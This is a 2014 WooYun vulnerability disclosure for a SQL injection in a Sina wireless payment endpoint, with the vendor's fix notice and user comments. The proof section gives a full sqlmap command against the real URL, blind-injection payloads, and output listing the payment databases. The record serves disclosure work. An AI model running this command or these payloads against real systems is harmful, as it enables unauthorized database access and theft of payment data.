当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076094

漏洞标题:新浪无线支付系统SQL注入漏洞之二

相关厂商:新浪

漏洞作者: 猪猪侠

提交时间:2014-09-15 01:34

修复时间:2014-09-15 21:37

公开时间:2014-09-15 21:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-15: 细节已通知厂商并且等待厂商处理中
2014-09-15: 厂商已经确认,细节仅向厂商公开
2014-09-15: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

新浪支付系统SQL注入漏洞之二,不同的域名,不同的点

详细说明:

sqlmap -u "http://ota.pay.mobile.sina.cn/platform/orderConfirm.php?sessionId=6756219&paymentTag=alipayAccount" -p sessionId --dbms=mysql --dbs

无线支付1.PNG

漏洞证明:

GET parameter 'sessionId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: sessionId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sessionId=6756219' AND 8002=8002 AND 'rIeO'='rIeO&paymentTag=alipayAccount
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sessionId=6756219' AND SLEEP(5) AND 'TPxS'='TPxS&paymentTag=alipayAccount
---
[13:28:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[13:28:32] [INFO] fetching database names
[13:28:32] [INFO] fetching number of databases
[13:28:32] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:28:32] [INFO] retrieved: 5
[13:28:34] [INFO] retrieved: information_schema
[13:29:38] [INFO] retrieved: sinapay
[13:30:04] [INFO] retrieved: sinapay_admin
[13:30:38] [INFO] retrieved: sinapay_music
[13:31:15] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] sinapay
[*] sinapay_admin
[*] sinapay_music
[*] test

修复方案:

安全转义

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-09-15 09:09

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

2014-09-15:新浪支付科技有限公司对乌云网站发布的WooYun-2014-76093和WooYun-2014-76094号漏洞的澄清函新浪支付于9月15日得知乌云网站公布了有关新浪支付系统漏洞的WooYun-2014-76093和WooYun-2014-76094号漏洞,公司非常重视,积极的开展自查工作,确认漏洞具体情况、影响范围和造成的影响。根据乌云网站提供的漏洞描述并验证,发现并非新浪支付系统存在的漏洞,此漏洞对新浪支付所经营的第三方支付业务不构成安全威胁和影响。新浪的相关部门已经修复此漏洞,并已公布了具体漏洞细节。非常感谢乌云对互联网安全事业做出的巨大贡献,也非常感谢所有合作伙伴对新浪支付业务的关注。


漏洞评价:

评论

  1. 2014-09-15 01:50 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    必火留名!

  2. 2014-09-15 01:50 | w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )

    喔噢

  3. 2014-09-15 02:16 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    刘明

  4. 2014-09-15 07:16 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    求自动工具

  5. 2014-09-15 08:26 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    求自动||手动工具

  6. 2014-09-15 08:36 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @浮萍 @齐迹 此工具将会于近期上架乌云market

  7. 2014-09-15 08:40 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    刘明

  8. 2014-09-15 08:41 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)

    刘明

  9. 2014-09-15 08:48 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    @px1624 已准备好wb 开始练手速

  10. 2014-09-15 08:55 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    工具将会于近期上架乌云market

  11. 2014-09-15 09:36 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    为毛我找不到新浪注入

  12. 2014-09-15 10:16 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @黑吃黑 一看你就没去参加乌云峰会

  13. 2014-09-15 11:34 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    ……洞主穷凶极恶

  14. 2014-09-15 22:45 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @黑吃黑 我好蛋疼.....

  15. 2014-09-15 23:10 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

    很好奇后端代码的逻辑,sessionId也能射...

  16. 2014-09-15 23:36 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

    洞主 用什么神器扫的注入

  17. 2014-09-16 00:34 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    新浪很紧张,差一点股票要跌几个亿了

  18. 2014-09-16 10:58 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    新浪很紧张,差一点股票要跌几个亿了

  19. 2014-09-16 14:47 | Undoit ( 普通白帽子 | Rank:167 漏洞数:25 | 打酱油)

    @px1624 估计不上了

  20. 2014-09-18 09:03 | 一十一 ( 路人 | Rank:2 漏洞数:3 | 不想做黑客的安全测试不是优秀的cybercop。...)

  21. 2014-09-18 21:47 | 丸子响当当 ( 路人 | Rank:8 漏洞数:5 | 学习温习•••••••)

    终于可以留名了,刚注册的。

  22. 2014-09-20 11:04 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    新浪很紧张,差一点股票要跌几个亿了

  23. 2014-09-21 21:33 | kaysen ( 路人 | Rank:8 漏洞数:3 | 折腾Python、Php、Linux)

    碉堡了

  24. 2014-09-23 13:59 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    @px1624 屌丝去不起

  25. 2014-10-10 18:14 | 随页清风 ( 普通白帽子 | Rank:131 漏洞数:41 | 剑有所指)

    火爆,牛